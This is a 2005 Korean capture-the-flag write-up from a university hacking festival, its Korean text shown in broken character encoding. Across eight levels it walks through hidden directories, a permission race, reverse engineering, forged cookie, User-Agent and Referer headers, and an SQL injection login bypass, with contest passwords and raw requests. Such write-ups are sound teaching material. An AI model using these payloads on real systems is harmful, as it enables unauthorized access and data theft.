========================== / SoonChunhyang Univ. / / Hacking Festival / / (report) / ========================== [hkpco@ns hkpco]# whoami id / hkpco mail&msn / hkpco@korea.com homepage / http://hkpco.kr/ name / ¹ÚÂù¾Ï school / ³²»ê°íµîÇб³ | Contents | ---------------------------------------------------------------- 1. level1 - Computer Knowledge Test | 2. level2 - Finding Directory and Similar Race Condition | 3. level3 - Equation problem and Interrupt | 4. level4 - Reverse Engineering -1 | 5. level5 - Guessing Account and Using a Method | 6. level6 - Checksum calculation | 7. level7 - Sql Injection | 8. level8 - Reverse Engineering -2 | ---------------------------------------------------------------- !!!!!!!!!!!!!!!!!! level1 - Computer Knowledge Test !!!!!!!!!!!!!!!!!! /* 18¹®Á¦ ÀÌ»ó ¸ÂÃç¾ß Æнº¿öµå°¡ ÁÖ¾î Áý´Ï´Ù. */ level1Àº ·£´ýÀ¸·Î Ãâ·ÂµÈ 20°³ÀÇ ¹®Á¦Áß 18¹®Á¦ ÀÌ»óÀ» ¸ÂÃß¸é ´Ù¸§ ·¹º§·Î ÁøÀÔ ÇÒ ¼ö ÀÖ½À´Ï´Ù. ±¸±Û µîÀÇ °Ë»ö¾ØÁøÀ» ÀÌ¿ëÇÏ½Ã¸é ½±°Ô Ç® ¼ö ÀÖ½À´Ï´Ù. ±×¸®°í ´Ù¸¥ ¹æ¹ýÀº, 18¹®Á¦ ÀÌ»óÀ» ¸ÂÃßÁö ¸øÇϸé "Ʋ·È½À´Ï´Ù." ¶ó°í Ãâ·Â ÇØ Áִµ¥ °Å±â¼­ µÚ·Î°¡±â ¹öÆ°À» ´©¸£¸é ¿ì¸®°¡ Ç®¾ú´ø ´ä°ú ¹®Á¦°¡ ±×´ë·Î ÀÖ½À´Ï´Ù. ±×·¡¼­ Ʋ¸° ¹®Á¦´Â ¼öÁ¤ÇÏ¿© ´Ù½Ã Ç®¸é ´õ¿í ½±°Ô Ç® ¼ö ÀÖ½À´Ï´Ù. { 18°³ ÀÌ»óÀ» ¸ÂÃá °æ¿ì Ãâ·Â } 18 °³ ¸¶Ãß¾ú ½À´Ï´Ù. level1 password is : no surprise !!!!!!!!!!!!!!!!!! level2 - Finding Directory and Similar Race Condition !!!!!!!!!!!!!!!!!! /* 59.27.205.110 id: level2 */ ¼­¹ö¿Í ¾ÆÀ̵𸸠ÁÖ¾îÁ³½À´Ï´Ù. óÀ½¿£ ssh brute_forceÀÎÁÙ ¾Ë°í ½ÃµµÇÏ·Á ÇÏ¿´´Âµ¥ ¾Ë°íº¸´Ï level1¿¡¼­ ³ª¿Ô´ø Á¤´äÀÌ level2°èÁ¤ÀÇ Æнº¿öµå¿´½À´Ï´Ù. ¹®Á¦¼­¹ö¿¡ Á¢¼ÓÀ» ÇÑ µÚ ls -al ¸í·ÉÀ¸·Î ÆÄÀÏÀ» º¸´Ï 3°³ÀÇ À̸§¾ø´Â µð·ºÅ丮°¡ Àǽɽº·¯¿ü½À´Ï´Ù. ssh login: level2 Password: Last login: Mon Nov 28 21:10:17 2005 from 61.99.161.93 [level2@stage1 ~]$ ls -al í©ê³ 44 drwxr-xr-x 3 root root 4096 11? drwxr-xr-x 2 root root 4096 11? drwxr-x--- 5 root level2 4096 11? drwxr-xr-x 5 root root 4096 11?. lrwxrwxrwx 1 root root 9 11?bash_history -> /dev/null -rw-r--r-- 1 level2 level2 24 11?bash_logout -rw-r--r-- 1 level2 level2 191 11?bash_profile -rw-r--r-- 1 level2 level2 124 11?bashrc -rwxr-xr-x 1 marilyn marilyn 1167 11?viminfo ÅÇÅ°¸¦ ÀÌ¿ëÇÏ¿© ´õ ÀÚ¼¼ÇÑ À̸§À» º¸¾Ò½À´Ï´Ù. [level2@stage1 ~]$ ls [tab][tab] ^B/ .bash_history .bash_profile .viminfo Hint ^V/ .bash_logout .bashrc ?/ ^B , ^V , ^? ¼ÂÁß Çϳª·Î µé¾î°¡¸é µÉ °Í ÀÔ´Ï´Ù. µð·ºÅ丮 ¸íÀ» È®ÀÎÇϱâ À§ÇÏ¿© hexdump¸í·É ¶Ç´Â xxd¸í·ÉÀ¸·Î ÇØ´ç µð·ºÀÇ 16Áø¼ö Äڵ带 º¼ ¼ö ÀÖ½À´Ï´Ù. [level2@stage1 ~]$ ls|xxd 0000000: 020a 160a 3f0a 4869 6e74 0a ....?.Hint. »ìÆ캻 °á°ú ^B¿¡ passwordÆÄÀÏÀÌ µé¾îÀÖ´Ù´Â °ÍÀ» È®ÀÎÇÏ¿´½À´Ï´Ù. ÇÏÁö¸¸, passwordÆÄÀÏÀ» level2ÀÇ ±ÇÇÑÀ¸·Ð ÀÐÀ» ¼ö ¾ø¾ú½À´Ï´Ù. [level2@stage1 ~]$ cd `printf "\x02"` [level2@stage1 ]$ ls chamber of secret [level2@stage1 ]$ cd chamber\ of\ secret\ \ \ \ \ \ \ \ \ \ \ \ \ \ / [level2@stage1 chamber of secret ]$ ls password tmp [level2@stage1 chamber of secret ]$ ls -l password -r--r----- 1 root root 42 11?assword °è¼Ó Çì¸ÞÀÌ´ø Áß, passwordÆÄÀÏÀÇ other¿¡ Çѹø¾¿ read Æ۹̼ÇÀÌ ÁÖ¾îÁø´Ù´Â°ÍÀ» È®ÀÎÇÏ¿´½À´Ï´Ù. [level2@stage1 chamber of secret ]$ ls -al password -r--r----- 1 root root 42 11?assword [level2@stage1 chamber of secret ]$ ls -al password -r--r----- 1 root root 42 11?assword [level2@stage1 chamber of secret ]$ ls -al password -r--r----- 1 root root 42 11?assword [level2@stage1 chamber of secret ]$ ls -al password -r--r----- 1 root root 42 11?assword [level2@stage1 chamber of secret ]$ ls -al password -r--r----- 1 root root 42 11?assword [level2@stage1 chamber of secret ]$ ls -al password -r--r--r-- 1 root root 42 11?assword ¡è other¿¡ read±ÇÇÑÀÌ ÁÖ¾îÁü!. ÀÌÁ¦ passwordÆÄÀÏÀ» loop¹®À¸·Î °è¼Ó Àеµ·Ï ÄÚµùÇÏ¸é ´äÀÌ ³ª¿Ã°ÍÀÔ´Ï´Ù. °£´ÜÈ÷ C·Î ÄÚµùÇÏ¿´½À´Ï´Ù. - read_loop.c - #include #include int main( void ) { while(1) { system( "cat /home/level2/\`printf \"\x02\"\`/cha\*/password" ); } } [level2@stage1 tmp]$ cat > read_loop.c #include #include int main( void ) { while(1) { system( "cat /home/level2/\`printf \"\x02\"\`/cha\*/password" ); } } [level2@stage1 tmp]$ gcc -o read_loop read_loop.c [level2@stage1 tmp]$ ./read_loop 2>/dev/null good job :) password is "info security" !!!!!!!!!!!!!!!!!! level3 - Equation problem and Interrupt !!!!!!!!!!!!!!!!!! /* 59.27.205.110 id: level3 [level3@stage1 ~]$ cat Hint x*x*x*x - 34*x*x*x - 340*x*x + 1858*x + 12915 a < b < c < d */ level3ÀÇ °èÁ¤µµ ¿ª½Ã level2¿¡¼­ ȹµæÇÑ Æнº¿öµå·Î Á¢¼ÓÇÏ¸é µË´Ï´Ù. ¼­¹ö¿¡ Á¢¼ÓÇÏ¿© Hint ÆÄÀÏÀ» º¸¸é À§¿Í°°Àº 4Â÷¹æÁ¤½ÄÀÌ ³ª¿À´Âµ¥¿ä, ¹æÁ¤½ÄÀ» Ǫ´Â ¹æ¹ýÀº Á÷Á¢ ¼ÕÀ¸·Î Ç®°Å³ª, ¸ÅƲ·¦(Matlab) À̶ó´Â ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ¸é ¼Õ½±°Ô ±ÙÀ» ±¸ÇÒ ¼ö ÀÖ½À´Ï´Ù. ±×·¸°ÔÇؼ­ ³ª¿Â ±ÙÀº ¾Æ·¡¿Í °°½À´Ï´Ù. a < b < c < d -9 < -5 < 7 < 41 ÀÌÁ¦, ¹®Á¦ÆÄÀÏÀÎ level3°ú Àú ±ÙÀ» ¿¬°ü½ÃÄÑ¾ß ÇÕ´Ï´Ù. level3ÀÇ ¹®Á¦ ÇÁ·Î±×·¥À» ½ÇÇàÇÏ´Ï ¾à 1ÃÊ°£°ÝÀ¸·Î OOps d = 1 , OOps d = 2 , OOps d = 3 ........ ÀÌ·±½ÄÀ¸·Î Ãâ·ÂµÇ°í ÀÖ¾ú½À´Ï´Ù. ¹ºÁö ¸ô¶ó Á¾·áÇÏ·Á°í ctrl+c , ctrl+x µîÀÇ ÀÎÅ͸³Æ®¸¦ º¸³»¾î º¸´Ï ¾Æ·¡¿Í °°ÀÌ, ÇØ´ç ÀÎÅ͸³Æ®¸¶´Ù ±Ù°ú °°Àº°ªµéÀÌ Áõ°¡ ȤÀº °¨¼Ò µÇ¾ú½À´Ï´Ù. OOps a = -1 , OOps c = 1 , OOps d = 12 ................ ±×·¡¼­ Àá½Ã »ý°¢ÇÑ °á°ú, level3 ÇÁ·Î±×·¥À» ½ÇÇà½ÃÄÑ °¢°¢ÀÇ ÀÎÅ͸³Æ®¸¦ º¸³»¾î ¿ì¸®°¡ ±¸Çß´ø ±ÙµéÀÇ °ªÀ¸·Î Á¶ÀýÇÏ¿© º¸¾Ò½À´Ï´Ù. °¢°¢ÀÇ ±ÙµéÀº ¾Æ·¡¿Í °°ÀÌ ÀÎÅ͸³Æ®¸¦ º¸³»¸é Á¶ÀýµÇ¾î Áý´Ï´Ù. ========================== a = Ctrl + C b = Ctrl + \ c = Ctrl + Z d = 1sec¸¶´Ù +1¾¿ Áõ°¡ ========================== À§¿Í°°Àº ¹æ½ÄÀ¸·Î a,b,c,dÀÇ °ªÀ» º¯°æÇϸé( ´Ü, d°¡ 41ÀÌ µÇ±â Àü¿¡ a,b,c°ªÀ» ¸ðµÎ ¼öÁ¤ÇØ ÁÖ¾î¾ß ÇÕ´Ï´Ù. ) Á¶±Ý ÈÄ¿¡ Æнº¿öµå°¡ ¶ß°ÔµË´Ï´Ù. OOps d = 38 OOps d = 39 OOps d = 40 OOps d = 41 rage against the cracker OOps d = 42 OOps d = 43 OOps d = 44 OOps d = 45 OOps d = 46 OOps d = 47 !!!!!!!!!!!!!!!!!! level4 - Reverse Engineering -1 !!!!!!!!!!!!!!!!!! /* http://59.27.205.110/level4/tksgkr/quest4.exe */ ¸®¹ö½º¿£Áö´Ï¾î¸µ ¹®Á¦ÀÔ´Ï´Ù. À̹ø ¹®Á¦´Â ¾à°£ ´Ù¸¥°÷¿¡ ½Ã°£À» »©¾Ñ±ä°Í °°½À´Ï´Ù. ^^ óÀ½¿¡´Â ¸®¹ö½ÌÀ» ÇÏ·Á°í ÇÏÁö ¾Ê°í ¹®Á¦°¡ ÀÖ´Â ¼­¹öÀÇ ip, ´ëȸ¼­¹öÀÇ ip range¸¦ ¿¹Àü¿¡ Á¦°¡ ¸¸µé¾î ³õÀº hkscanÀ¸·Î x.x.x.0 ~ x.x.x.255 , y.y.y.0 ~ y.y.y.255 ±îÁöÀÇ ¹üÀ§Áß 80¹øÆ÷Æ®°¡ ¿­¸° °÷¸¸ ã¾Æ¼­ À¥ÆäÀÌÁö¿¡¼­ .index.bakÀ» ¿äûÇØ º¸¾Ò½À´Ï´Ù. ÇÏÁö¸¸, ¿äû¹æ¹ýÀÌ À߸øµÇ¾î °á±¹¿£ ¸®¹ö½ÌÀ» ÇÑ µÚ, ¾ÆÀÌÇǸ¦ ã¾Æ °í¹Î³¡¿¡ ¾Ë¾Æ³»°Ô µÇ¾ú½À´Ï´Ù. ¿ì¼±, level4.exeÆÄÀÏÀ» ¹ÞÀº µÚ ollydbg·Î ÆÄÀÏÀ» openÇÕ´Ï´Ù. õõÈ÷ »ìÆ캸´Ï ÀÔ·ÂÇÑ ip¸¦ 80¹øÆ÷Æ®·Î ¾Æ·¡¿Í°°ÀÌ ¿äûÇØ ÁÖ¾ú½À´Ï´Ù. GET .index.bak HTTP/1.0 User-Agent: HTTPTEST ¾Æ¸¶µµ ƯÁ¤ À¥¼­¹öÀÇ ÁÖ¼Ò¸¸ ãÀ¸¸é ¹®Á¦ÀÇ ´äÀº ½±°Ô ¾Ë¾Æ ³¾ ¼ö ÀÖÀ»°Í °°¾Æ µð¹ö±ëÀ» ÇÏ¿´½À´Ï´Ù. [Search for] -> [All referenced text strings]À¸·Î »ìÆì º¸´Ï ´ÙÀ½°ú°°Àº ³×°³ÀÇ °ªÀÌ Àǽɽº·¯¿ü½À´Ï´Ù. 1) ASCII "0592842722" 2) ASCII "2027148262" 3) ASCII "2320512323" 4) ASCII "2221114222" ¾Æ¸¶µµ ÀÌ ³×°³ÀÇ °ªÀÌ ip¸¦ ¾òÀ» ¼ö ÀÖ´Â ¿øõÀÌ µÇ´Â°Í °°¾Ò½À´Ï´Ù. 1) ¿¡ break¸¦ °É°í runÀ» ÇÏ¿© ¾Æ¹« Á¤¼ö°ªÀ̳ª ³ÖÀº µÚ F8À» ÀÌ¿ëÇÏ¿© ÇϳªÇϳª¾¿ »ìÆì°¬½À´Ï´Ù. Á¶±Ý °¡´Ï loop°¡ ÃÑ 4¹ø ¼øȯÇϴµ¥ ip°¡ ¸¸µé¾îÁö°í ÀÖ¾ú½À´Ï´Ù!.. F8À» ÀÌ¿ëÇÏ¿© 4¹ø ¸ðµÎ ¼øȯ½ÃÅ°°í º¸´Ï ¿ì¸®°¡ ±¸ÇÏ°íÀÚÇß´ø ip°¡ ¹Ù·Î ¹®Á¦¼­¹öÀÇ ip¿´½À´Ï´Ù!.. ¾Æ.. À§¿¡¼­ ip_range¸¦ scanÇÏ¿© ¿äûÀ» º¸³¾¶§ Á¦´ë·Î º¸³Â¾ú´õ¶ó¸é ÀÌ·± ½Ã°£³¶ºñ´Â ¾ø¾úÀ»²¨¶õ »ý°¢ÀÌ Ãæ°Ý°úÇÔ²² µé¾ú½À´Ï´Ù. telnet¸í·ÉÀ» ÀÌ¿ëÇÏ¿© 80¹øÆ÷Æ®·Î Á¢¼ÓÇÑ µÚ .index.bakÀ» ¿äûÇϸé Á¤´äÀÌ ³ª¿À°Ô µË´Ï´Ù. [hkpco@ns sch]$ telnet 59.027.205.111 80 Trying 59.27.205.111... Connected to 59.027.205.111. Escape character is '^]'. GET /.index.bak HTTP/1.0 HTTP/1.1 200 OK Date: Sun, 27 Nov 2005 16:43:29 GMT Server: Apache/2.0.52 (Fedora) Last-Modified: Sat, 26 Nov 2005 00:17:50 GMT ETag: "a81d0-3a-ccdb4780" Accept-Ranges: bytes Content-Length: 58 Connection: close Content-Type: text/plain; charset=UTF-8 ISEhTGV2ZWw0ICEhIQ0KUGFzc3dvcmQgOiBrbm93IHlvdXIgZW5lbXk= Connection closed by foreign host. Æнº¿öµå´Â ISEhTGV2ZWw0ICEhIQ0KUGFzc3dvcmQgOiBrbm93IHlvdXIgZW5lbXk= ÀÌÁö¸¸ base64·Î encodingµÈ°ÍÀ» Ç®¸é, !!!Level4 !!! Password : know your enemy ÃÖÁ¾ÀûÀÎ ´äÀÌ ±¸ÇØÁý´Ï´Ù. !!!!!!!!!!!!!!!!!! level5 - Guessing Account and Using a Method !!!!!!!!!!!!!!!!!! /* http://59.27.205.110/level5/guqehdrhks/level5.html ·Î±×ÀÎ : id : pass : level5Àº º¸¾È¼ºÀÌ ¶Ù¾î³­ "SecurityFirst Explorer" ¸¦ »ç¿ëÇÏ¿©¾ß ÇÏ°í 192.168.111.222/level5.html ÆäÀÌÁö¿¡¼­ Á¢±Ù ÇÏ¿©¾ß ÇÑ´Ù. guest page | level5 page */ À̹ø ¹®Á¦´Â id¿Ípass¸¦ ÃßÃøÇÏ¿© ¹®Á¦¼­¹öÀÇ ³»ºÎ¼­¹ö¿¡¼­ ¹®Á¦¼­¹öÀÇ level5ÆäÀÌÁö·Î Á¢±ÙÇÏ¿©¾ß ÇÕ´Ï´Ù. ¾Æ¸¶µµ guest page ¶ó°í µÇ¾îÀִ°ÍÀ» º¸¾Æ ¾ÆÀ̵ð´Â guestÀÎ°Í °°½À´Ï´Ù.( ³ªÁß¿¡ ÈùÆ®¿¡µµ guest¶ó°í ³ª¿Ô±¸¿ä.. ^^ ) pass´Â a·Î ½ÃÀÛÇÏ´Â 4±ÛÀÚ¿´½À´Ï´Ù. ¸î¹øÀÇ ÃßÃø°á°ú pass°¡ asdf¶ó´Â°ÍÀ» °£´ÜÇÏ°Ô ¾Ë ¼ö ÀÖ¾ú½À´Ï´Ù. ·Î±×ÀÎÀ» Çϸé `guest ·Î ·Î±×ÀÎ µÇ¾ú½À´Ï´Ù` ¶ó´Â ¸Þ½ÃÁö°¡ ¶á µÚ, refresh·Î ´Ù½Ã ¹®Á¦ÆäÀÌÁö·Î À̵¿ÇÏ°Ô µË´Ï´Ù. javascript:document.cookie¸¦ ÀÌ¿ëÇÏ¿© ÄíÅ°°ªÀ» È®ÀÎÇØ º¸¾Ò½À´Ï´Ù. user=guest ¶ó´Â °ªÀÌ ³ª¿Â°É º¸¾Æ ¾Æ¸¶µµ level5ÀÇ ÄíÅ°´Â user=level5·Î ÀÎÁõÇÏ¸é µÉ°ÍÀÔ´Ï´Ù. ´ÙÀ½, SecurityFirst ExplorerÀ̶ó´Â À¥ºê¶ó¿ìÀú¸¦ »ç¿ëÇؾßÇÑ´Ù°í µÇ¾îÀִµ¥, ºê¶ó¿ìÀúÀÇ Á¤º¸´Â User-Agent¿¡ Àֱ⠶§¹®¿¡, ¿ì¸®´Â User-AgentÀÇ °ªÀ» SecurityFirst Explorer·Î ¸¸µé¾î ÁÖ¸é °£´ÜÈ÷ ºê¶ó¿ìÀúÀÇ Ã¼Å©µµ Åë°ú ÇÒ ¼ö ÀÖ½À´Ï´Ù. À§ÀÇ ³»¿ëµéÀ» ¸ð¾Æ ¿äûÀ» º¸³» º¸¾Ò½À´Ï´Ù. [hkpco@ns hkpco]$ telnet 59.27.205.110 80 Trying 59.27.205.110... Connected to 59.27.205.110. Escape character is '^]'. GET http://59.27.205.110/level5/guqehdrhks/level5.php HTTP/1.0 User-Agent: SecurityFirst Explorer Cookie: user=level5; HTTP/1.1 200 OK Date: Mon, 28 Nov 2005 12:00:55 GMT Server: Apache/2.0.53 (Fedora) X-Powered-By: PHP/4.3.11 Content-Length: 134 Connection: close Content-Type: text/html; charset=EUC-KR Content-Language: kr Connection closed by foreign host. 192.168.111.222/level5.html¿¡¼­ Á¢±ÙÇÏ¿©¾ß ÇÑ´Ù¸ç ´äÀ» ¾Ë·ÁÁÖÁö ¾Ê½À´Ï´Ù. óÀ½¿£ ³Ê¹« Á¤½ÅÀÌ ¾ø¾ú´ø ³ª¸ÓÁö 192.168.111.222/level5.html·Î Á¢±Ù ÇÏ¿©¾ß ÇÏ´Â ÁÙ ¾Ë°í Çì¸Þ¿´½À´Ï´Ù. ´Ù½Ãº¸´Ï 192.168.111.222/level5.html¿¡¼­ Á¢±ÙÇÏ´Â °ÍÀÌ¿©¼­ Referer method¸¦ ÀÌ¿ëÇÏ¿´½À´Ï´Ù. RefererÀº ¾î¶°ÇÑ ÆäÀÌÁö¿¡ Á¢±ÙÇϱ⠹ٷΠÀü ÆäÀÌÁö¸¦ ³ªÅ¸³»¾î ÁÝ´Ï´Ù. ´Ù½Ã Çѹø RefererÀ» Ãß°¡½ÃÄÑ ¿äûÀ» º¸³»¾î º¸°Ú½À´Ï´Ù. [hkpco@ns sch]$ telnet 59.27.205.112 80 Trying 59.27.205.112... Connected to 59.27.205.112. Escape character is '^]'. GET http://59.27.205.112/level5/guqehdrhks/level5.php HTTP/1.0 User-Agent: SecurityFirst Explorer Referer: 192.168.111.222/level5.html Cookie: user=level5; HTTP/1.1 200 OK Date: Sun, 27 Nov 2005 20:30:00 GMT Server: Apache/2.0.52 (Fedora) X-Powered-By: PHP/4.3.9 Content-Length: 81 Connection: close Content-Type: text/html; charset=EUC-KR
level5 ´Ô ¾È³çÇϼ¼¿ä.
level5 ´ÔÀÇ Æнº¿öµå´Â plastic tree ÀÔ´Ï´Ù.
Connection closed by foreign host. level5ÀÇ Æнº¿öµå¸¦ ȹµæÇÏ¿´½À´Ï´Ù!. !!!!!!!!!!!!!!!!!! level6 - Checksum calculation !!!!!!!!!!!!!!!!!! /* http://59.27.205.110/level6/WkWk/level6.html IPv4 header (1) -------------------------------- 45 00 00 40 F5 DA 40 00 80 06 C0 A8 00 02 42 A1 27 C3 IPv4 header (2) -------------------------------- 45 00 00 3E 24 BD 00 00 80 11 3B 1B CD 78 A8 7E 3F 01 */ °¢°¢ 2Ä­¾¿ ÃÑ 4Ä­ ºñ¿öÁ® Àִµ¥, ÆÐŶÀ» ĸÃÄÇØ º¸¸é Àú ºóÄ­ÀÌ Checksum°ªÀΰÍÀ» ½±°Ô ¾Ë ¼ö ÀÖ½À´Ï´Ù. °ªÀ» ºÐ¼®ÇØ º¸¸é ¾Æ·¡¿Í °°ÀÌ ³ª¿À°Ô µË´Ï´Ù. (45 00)ip_version (00 40)total_length (F5 DA)id (40 00)flags (80)time_to_live: 128 (06)protocol -TCP ( )check_sum (C0 A8 00 02)source_ip: 192.168.0.2 (42 A1 27 C3)des_ip : 66.161.39.195 (45 00)ip_version (00 3E)total_length (24 BD)id (00 00)flags (80)time_to_live (11)protocol ( )check_sum (3B 1B CD 78)source_ip: 59.27.205.120 (A8 7E 3F 01)des_ip : 168.126.63.1 ÀÌ °ªµéÀ» raw¼ÒÄÏÀ» ÇÒ¶§ ¾²ÀÌ´Â checksum°è»êÇÔ¼ö¸¦ ÀÌ¿ëÇÏ¿© ±¸ÇÒ¼öµµ ÀÖ°í, °è»ê¹ýÀ» °¡Áö°í Á÷Á¢ °è»êÇÏ´Â ¹æ¹ýµµ ÀÖ½À´Ï´Ù. ¿©±â¼­´Â °è»êÇÏ´Â ¹æ¹ýÀ¸·Î IPv4 header (1) ÀÇ checksum¸¸ ±¸Çغ¸°Ú½À´Ï´Ù. {checksum °è»ê} ================================================================ 1. 16ºñÆ® ´ÜÀ§·Î Çì´õ¸¦ ÀüºÎ ´õÇÑ´Ù. 2. ÇÕÀÌ 16ºñÆ®°¡ ³ÑÀ¸¸é 16ºñÆ® ´ÜÀ§·Î ´õÇؼ­ 16ºñÆ®·Î ¸¸µç´Ù. 3. 1ÀÇ º¸¼ö·Î ¸¸µé¸é üũ¼¶ÀÌ µÈ´Ù. ================================================================ 4500+0040+F5DA+4000+8006+C0A8+0002+42A1+27C3 = 3262E ( 16ºñÆ® ´ÜÀ§·Î Çì´õ¸¦ ´õÇÕ´Ï´Ù ) 3262E = 262E , 0003 / 262E + 0003 = 2631 ( ÇÕÀÌ 16ºñÆ®°¡ ³ÑÀ¸¹Ç·Î 16ºñÆ®´ÜÀ§·Î ´õÇؼ­ 16ºñÆ®·Î ¸¸µì´Ï´Ù ) 0010 0110 0011 0001 -> 1101 1001 1100 1110 ( 2Áø¼ö·Î ¹Ù²Û µÚ 1ÀÇ º¸¼ö¸¦ ÃëÇÕ´Ï´Ù ) 11011001 11001110 -> D9 DE ( D9¿Í DE°¡ IPv4 header(1)ÀÇ checksumÀÌ µË´Ï´Ù ) ÀÌ·¯ÇÑ ½ÄÀ¸·Î IPv4 header(2)±îÁö ±¸Çؼ­ °ªÀ»³Ö¾î º¸³»¸é... password is "packet storm" !!!!!!!!!!!!!!!!!! level7 - Sql Injection !!!!!!!!!!!!!!!!!! /* http://59.27.205.110/level7/dkdfl/level7.html ÀÌ ¸§ : º° ¸í : µî·Ï¹øÈ£ : [ È®ÀÎÇϱâ ] */ ¸ðµçºÐµéÀÌ Á¦ÀÏ »¡¸® Ǭ ¸Ó¸®¸¦ ¸¼°ÔÇÏ´Â ¹®Á¦ÀÎ°Í °°½À´Ï´Ù. :-) À̸§°ú º°¸í, µî·Ï¹øÈ£ ¶õ¿¡ °¢°¢ °ªÀ» Áý¾î³ÖÀº µÚ È®ÀÎÇϱ⠹öÆ°À» ´©¸£¸é ¿ì¸®°¡ ÀÔ·ÂÇß´ø °ªÀÌ ³ª¿É´Ï´Ù. javascript:document.cookie¸¦ ÀÌ¿ëÇÏ¿© ÄíÅ°°ªÀ» º¸°ÔµÇ¸é µî·Ï¹øÈ£¶õ¿¡ ÀÔ·ÂÇÏ¿´´ø °ªÀÌ ÄíÅ°°¡ µË´Ï´Ù. ±×·¡¼­ ÀÌ ºÎºÐÀ» ¿ìȸÇϵµ·Ï °£´ÜÇÑ sql¹®À» »ðÀÔÇϸé ÀÎÁõÀ» Åë°úÇϰԵǾî, °ü¸®ÀÚ¿Í µ¿µîÇÑ ±ÇÇÑÀ¸·Î º»ÀÎ »Ó¸¸ ¾Æ´Ï¶ó ´Ù¸¥»ç¶÷ÀÌ ÀÔ·ÂÇÑ °ªµéµµ ¸ðµÎ º¼ ¼ö ÀÖ°Ô µË´Ï´Ù. µî·Ï¹øÈ£¶õ¿¡ 'or 0=' ¿Í°°Àº sqlÀÎÁõÀ» ¿ìȸÇÏ´Â Äõ¸®¹®À» ³ÖÀºµÚ Àü¼ÛÇÏ¿© È®ÀÎÇϱ⸦ Ŭ¸¯ÇØ º¸¸é ¸ðµç »ç¶÷µéÀÌ ÀÔ·ÂÇÑ Äõ¸®¹®À» È®ÀÎ ÇÒ ¼ö Àִµ¥ ã¾Æº¸¸é, ±× Áß Æнº¿öµå°¡ ÀÖ½À´Ï´Ù. *********************************************** your information : ÀÌ ¸§ : password is : º° ¸í : comeasyouare µî·Ï¹øÈ£ : 2002338720034713 *********************************************** password is comeasyouare ^^ !!!!!!!!!!!!!!!!!! level8 - Reverse Engineering -2 !!!!!!!!!!!!!!!!!! /* http://59.27.205.110/level8/chlrhdi/level8.exe */ µåµð¾î ¸¶Áö¸· ¹®Á¦¿¡ Á¤ÂøÇÏ¿´½À´Ï´Ù. level8µµ ¿ª½Ã³ª level4¿¡¼­Ã³·³ ¸®¹ö½º¿£Áö´Ï¾î¸µÀ¸·Î Ǫ´Â ¹®Á¦ÀÔ´Ï´Ù. ÇÁ·Î±×·¥À» ½ÇÇà½ÃÄѺ¸´Ï ¿·ÂÊ¿¡ 16Áø¼ö Äڵ尡 Àֱ淡 °£´ÜÇÑ ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ¿© ¹®ÀÚ·Î º¯È¯½ÃÄÑ º¸¾Ò½À´Ï´Ù. [hkpco@ns public_html]$ cat hk.c /* made by hkpco mail&msn : hkpco@korea.com homepage : http://hkpco.kr/ */ #include #include #include #include int main( int argc , char **argv ) { int i=0; int s=0; char *ch[256] = { 0x00, }; if( argc < 3 ) { fprintf( stderr , "fuck\n" ); return -1; } do { if( i== 0 ) ch[i] = strtok( argv[1] , argv[2] ); sscanf( ch[i] , "%x" , &s ); printf( "%c" , s ); i++; } while( ch[i] = strtok( NULL , argv[2] ) ); printf( "\n" ); return 0; } [hkpco@ns public_html]$ ./hk "3B 10 40 00 00 00 00 00 6F 75 20 61 47 6F 6F 64 20 49 73 20 72 79 20 79 20 00 00 00 72 65 20 77 00 00 00 00 18 22 40 00 00 00 00 00 88 FE 12 00 98 0A 00 00" " " ;@ou aGood Is ry y re w"@? Áö±Ýº¸´Ï ¹®Á¦Ç®ÀÌ¿Í´Â Á÷Á¢Àû ¿¬°üÀÌ ¾ø´Â°Í °°¾Ò½À´Ï´Ù. ÀÌÁ¦ ¸®¹ö½ÌÀ» ÇØ º¸°Ú½À´Ï´Ù. ollydbg¸¦ ÀÌ¿ëÇÏ¿© level8.exe¹®Á¦¸¦ openÇÕ´Ï´Ù. [Search for] -> [All referenced text strings]¸¦ ÀÌ¿ëÇÏ¿© ¸ðµç ¹®ÀÚ¿­À» ã½À´Ï´Ù. ASCII " Sorry You are wrong " ASCII "Good Job! Serial Is Right!" ASCII " Sorry You are wrong " ASCII " Sorry You are wrong " ASCII "sch_sf.exe" À̺κеéÀÌ ¹®Á¦Ç®ÀÌ¿Í ¿¬°ü¼ºÀÌ Àִ°Íó·³ º¸ÀÔ´Ï´Ù. ASCII " Sorry You are wrong " ASCII "Good Job! Serial Is Right!" ASCII " Sorry You are wrong " ASCII " Sorry You are wrong " ¿©±â¿¡ break¸¦ °É°í ÇÁ·Î±×·¥À» ½ÇÇà½ÃÄÑ ÀÓÀÇÀÇ ¹®ÀÚ¿­°ú Á¤¼ö¸¦ ÀÔ·ÂÇÑ µÚ ½ÇÇàÇÕ´Ï´Ù. ±×·³ ¿ì¸®°¡ break¸¦ °É¾ú´ø ºÎºÐÀ¸·Î À̵¿ÇÏ°Ô µË´Ï´Ù. 00401749 |. 68 44404000 PUSH level8.00404044 ; ASCII " Sorry You are wrong " À̺κп¡¼­ Á¶±Ý¸¸ À§ÂÊÀ¸·Î °¡°ÔµÇ¸é 0040170C /$ 55 PUSH EBP ÀÌ·¸°Ô ÇÁ·Î±×·¥³»ÀÇ ºÎºÐÀûÀÎ ·çƾÀÌ ½ÃÀÛÇÏ´Â ºÎºÐÀÌ ÀְԵ˴ϴÙ. ¾Æ·§ÂÊ ¹Ú½º¿¡ º¸´Ï Local call from 004016E6À̶ó°í ³ª¿ÍÀִµ¥ ÀÌ°÷À» callÇÑ ºÎºÐÀ¸·Î À̵¿Çϱâ À§ÇÏ¿© [Go to] -> [Call from 004016E6] À» ¼öÇàÇÕ´Ï´Ù. ±×·³ ¹Ù·Î À§ÂÊ ¾îµð·Î °¥°Çµ¥, À§·Î µû¶ó°¡¼­ ¾Æ·¡¿Í °°ÀÌ ±× ·çƾÀÇ ½ÃÀۺκРÀ¸·Î À̵¿ÇÕ´Ï´Ù. 0040142B /. 55 PUSH EBP ¿©±â¼­ ¾ÆÀ̵𸦠°¡Áö°í ¾ÏȣȭÇÏ¿© ÀúÀåÇÏ°í ºñ±³ÇÏ´Â ±¸¹®ÀÌ Á¸ÀçÇÏ°Ô µË´Ï´Ù. °è¼Ó µû¶ó°¡¸é¼­ ÃßÀûÇØ ³ª°¡¸é µÇÁö¸¸, ÁÖÀÇÇØ¾ß ÇÒ °ÍÀº ÆÄÀϳ×ÀÓÀÌ sch_sf.exeÀ̾î¾ß 